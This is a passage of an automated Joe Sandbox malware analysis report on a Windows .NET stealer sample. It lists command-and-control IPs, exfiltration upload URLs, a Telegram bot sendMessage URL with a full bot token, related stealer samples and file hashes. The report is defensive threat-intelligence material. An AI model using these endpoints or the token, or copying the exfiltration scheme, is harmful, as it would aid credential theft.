                                                                            http://schemas.xmlsoap.org/soap/encoding/BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://206.166.251.4BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://154.9.207.142:443BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://209.38.221.184:8080/yrABY_userBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://209.38.221.184:8080BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854CBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.w3.orBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://206.166.251.4:8080BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://51.159.4.50:8080/3TJejBPXtn/yrABY_userBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://194.164.198.113:8080BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://38.207.174.88:8080BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://51.159.4.50:8080/get/3TJejBPXtn/yrABY_userBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://ip-api.com/line?fields=queryBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://159.203.174.113:8090BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://101.126.19.171:80BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://51.159.4.50:8080/yrABY_user%40841618_report.wsrBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://www.ecosia.org/newtab/BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://51.159.4.50:8080/getBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://185.217.98.121:443BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://46.235.26.83:8080BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://ac.ecosia.org/autocomplete?q=BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://116.202.101.219:8080BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://46.235.26.83:80802aBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://38.60.191.38:80BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://67.230.176.97:8080BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://147.28.185.29:80/%79%72%41%42%59%5F%6A%6F%6E%65%73%40%38%34%31%36%31%38%5F%72%65%70%6F%72%74%BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://46.235.26.83BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://132.145.17.167:9090BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://api.teleBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/wsdl/BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp, BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011855079000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://127.0.0.1:18772/handleOpenWSR?r=BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://51.159.4.50:8080BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://8.222.143.111:8080BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://206.166.251.4:8080/yrABY_userBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://support.mozilla.orgBA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C4F000.00000004.00000800.00020000.00000000.sdmp, BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesBA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011865182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://41.87.207.180:9090BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://api.telegram.orgBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://api.telegram.org/bot7617703274:AAFEXxgPRP1fZGT5UCjcRV4hUZdtNFxyusQ/sendMessage?chat_id=-4568BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://206.166.251.4:80802aBA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown

                                                                                                                                        World Map of Contacted IPs

                                                                                                                                        • No. of IPs < 25%
                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                        • 75% < No. of IPs

                                                                                                                                        Public IPs

                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                        209.38.221.184
                                                                                                                                        		unknownUnited States
                                                                                                                                        		7018ATT-INTERNET4UStrue
                                                                                                                                        208.95.112.1
                                                                                                                                        		ip-api.comUnited States
                                                                                                                                        		53334TUT-ASUSfalse
                                                                                                                                        149.154.167.220
                                                                                                                                        		api.telegram.orgUnited Kingdom
                                                                                                                                        		62041TELEGRAMRUfalse
                                                                                                                                        206.166.251.4
                                                                                                                                        		unknownUnited States
                                                                                                                                        		7816CTCUStrue
                                                                                                                                        51.159.4.50
                                                                                                                                        		unknownFrance
                                                                                                                                        		12876OnlineSASFRtrue
                                                                                                                                        46.235.26.83
                                                                                                                                        		unknownGermany
                                                                                                                                        		33984SURFPLANET-ASDEtrue
                                                                                                                                        147.28.185.29
                                                                                                                                        		unknownUnited States
                                                                                                                                        		3130RGNET-SEARGnetSeattleWestinEEtrue

                                                                                                                                        General Information

                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                        Analysis ID:1570929
                                                                                                                                        Start date and time:2024-12-08 13:01:04 +01:00
                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                        Overall analysis duration:0h 3m 56s
                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                        Report type:full
                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                        Number of analysed new started processes analysed:18
                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                        Technologies:
                                                                                                                                        • HCA enabled
                                                                                                                                        • EGA enabled
                                                                                                                                        • AMSI enabled
                                                                                                                                        Analysis Mode:default
                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                        Sample name:BA9qyj2c9G.exe
                                                                                                                                        renamed because original name is a hash value
                                                                                                                                        Original Sample Name:C9495B3A992EA3E2EF2788C7BA7ED840.exe
                                                                                                                                        Detection:MAL
                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@26/3@2/7
                                                                                                                                        EGA Information:
                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                        HCA Information:
                                                                                                                                        • Successful, ratio: 99%
                                                                                                                                        • Number of executed functions: 19
                                                                                                                                        • Number of non-executed functions: 8
                                                                                                                                        Cookbook Comments:
                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                        • Stop behavior analysis, all processes terminated

                                                                                                                                        Warnings

                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                        Simulations

                                                                                                                                        Behavior and APIs

                                                                                                                                        TimeTypeDescription
                                                                                                                                        07:01:54API Interceptor309x Sleep call for process: BA9qyj2c9G.exe modified

                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                        IPs

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        209.38.221.184file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                                                        • 209.38.221.184:8080/yLWFd_user%40927537_report.wsr
                                                                                                                                        208.95.112.1xooSsYaHN0.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                                                                                        • ip-api.com/json
                                                                                                                                        ea4LTmpMwl.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                        • ip-api.com/json/
                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, StealcBrowse
                                                                                                                                        • ip-api.com/json/
                                                                                                                                        file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                        • ip-api.com/json/
                                                                                                                                        u7e3vb5dfk.exeGet hashmaliciousXWormBrowse
                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                        a9YMw44iQq.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                        ozgpPwVAu1.exeGet hashmaliciousXWormBrowse
                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                        PG4w1WB9dE.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                        a4BE6gJooT.exeGet hashmaliciousXWormBrowse
                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                        grK0Oh8p4Z.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                        149.154.167.220ea4LTmpMwl.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, StealcBrowse
                                                                                                                                            INVOICES.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                              file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                INQUIRY REQUEST AND PRICES_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                  RFQ Order list #2667747.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                    Payment Details Ref#577767.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                      IBAN Payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                        ozgpPwVAu1.exeGet hashmaliciousXWormBrowse
                                                                                                                                                          vUlh7stUHJ.exeGet hashmaliciousXWormBrowse

                                                                                                                                                            Domains

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            ip-api.comxooSsYaHN0.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                                                                                                            • 208.95.112.1
                                                                                                                                                            ea4LTmpMwl.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                            • 208.95.112.1
                                                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, StealcBrowse
                                                                                                                                                            • 208.95.112.1
                                                                                                                                                            file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                            • 208.95.112.1
                                                                                                                                                            u7e3vb5dfk.exeGet hashmaliciousXWormBrowse
                                                                                                                                                            • 208.95.112.1
                                                                                                                                                            a9YMw44iQq.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                            • 208.95.112.1
                                                                                                                                                            ozgpPwVAu1.exeGet hashmaliciousXWormBrowse
                                                                                                                                                            • 208.95.112.1
                                                                                                                                                            PG4w1WB9dE.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                            • 208.95.112.1
                                                                                                                                                            a4BE6gJooT.exeGet hashmaliciousXWormBrowse
                                                                                                                                                            • 208.95.112.1
                                                                                                                                                            grK0Oh8p4Z.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                            • 208.95.112.1
                                                                                                                                                            api.telegram.orgea4LTmpMwl.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, StealcBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            INVOICES.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            INQUIRY REQUEST AND PRICES_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            Bank Swift and SOA PRN00720031415453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            RFQ Order list #2667747.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            Payment Details Ref#577767.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            IBAN Payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            ozgpPwVAu1.exeGet hashmaliciousXWormBrowse
                                                                                                                                                            • 149.154.167.220

                                                                                                                                                            ASNs

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            ATT-INTERNET4USmeerkat.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 108.225.104.149
                                                                                                                                                            meerkat.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 68.250.47.28
                                                                                                                                                            meerkat.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 68.122.208.101
                                                                                                                                                            meerkat.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 75.33.176.164
                                                                                                                                                            meerkat.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 172.190.16.7
                                                                                                                                                            atthings.docGet hashmaliciousRemcosBrowse
                                                                                                                                                            • 216.9.226.100
                                                                                                                                                            arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 107.214.238.161
                                                                                                                                                            arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 69.228.169.53
                                                                                                                                                            jmhgeojeri.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 65.64.43.40
                                                                                                                                                            i686.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 107.100.238.166
                                                                                                                                                            TELEGRAMRUea4LTmpMwl.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            new.ini.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                            • 149.154.164.13
                                                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, StealcBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            INVOICES.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            INQUIRY REQUEST AND PRICES_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            RFQ Order list #2667747.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            Payment Details Ref#577767.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            IBAN Payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            ozgpPwVAu1.exeGet hashmaliciousXWormBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            TUT-ASUSxooSsYaHN0.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                                                                                                            • 208.95.112.1
                                                                                                                                                            ea4LTmpMwl.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                            • 208.95.112.1
                                                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, StealcBrowse
                                                                                                                                                            • 208.95.112.1
                                                                                                                                                            file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                            • 208.95.112.1
                                                                                                                                                            u7e3vb5dfk.exeGet hashmaliciousXWormBrowse
                                                                                                                                                            • 208.95.112.1
                                                                                                                                                            a9YMw44iQq.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                            • 208.95.112.1
                                                                                                                                                            ozgpPwVAu1.exeGet hashmaliciousXWormBrowse
                                                                                                                                                            • 208.95.112.1
                                                                                                                                                            PG4w1WB9dE.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                            • 208.95.112.1
                                                                                                                                                            a4BE6gJooT.exeGet hashmaliciousXWormBrowse
                                                                                                                                                            • 208.95.112.1
                                                                                                                                                            grK0Oh8p4Z.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                            • 208.95.112.1

                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eList of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            List of required items.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            List of Required items and specifications.pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            8AE6w4efXi.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            ea4LTmpMwl.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            YWFMFVCSun.batGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            8AE6w4efXi.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            7rTjhbfF6L.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                            • 149.154.167.220

                                                                                                                                                            Dropped Files

                                                                                                                                                            No context

                                                                                                                                                            Created / dropped Files

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BA9qyj2c9G.exe.log

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\BA9qyj2c9G.exe
                                                                                                                                                            File Type:CSV text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1498
                                                                                                                                                            Entropy (8bit):5.364175471524945
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:ML9E4KQEAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoC1qE4GIs0E4K6sXE4Npv:MxHKQEAHKKkKYHKGSI6oPtHTHK1qHGI8
                                                                                                                                                            MD5:1B713A2FD810C1C9A8F6F6BE36F406B1
                                                                                                                                                            SHA1:0828576CB8B83C21F36AD29E327D845AB3574EBB
                                                                                                                                                            SHA-256:E51E809582894F4D484939BE3990DFC914E43F4AF72AE55A00B01FCFE348763B
                                                                                                                                                            SHA-512:D32200B7FA9D0DFEF4011D98D40260838A522E63C874FBCCE00D331D663169DBE1C613AD0E81C76F69A8CE6C7265605175CA75BA2C8BDA7748290B34579E148B
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                                                                                                                                            C:\Users\user\AppData\Local\clg34ib74p\report.lock

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\BA9qyj2c9G.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:1

                                                                                                                                                            \Device\Null

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\timeout.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.41440934524794
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                                                                                                                            MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                                                                                                                            SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                                                                                                                            SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                                                                                                                            SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..

                                                                                                                                                            Static File Info

                                                                                                                                                            General

                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Entropy (8bit):5.402766751415197
                                                                                                                                                            TrID:
                                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                            File name:BA9qyj2c9G.exe
                                                                                                                                                            File size:167'424 bytes
                                                                                                                                                            MD5:c9495b3a992ea3e2ef2788c7ba7ed840
                                                                                                                                                            SHA1:3d2e2ff99cd28f81a906d8d928ad7d42ff5226be
                                                                                                                                                            SHA256:3398ed7cffcc75371d831fda315805c714268c321c863f60c806ae73cfaae4cd
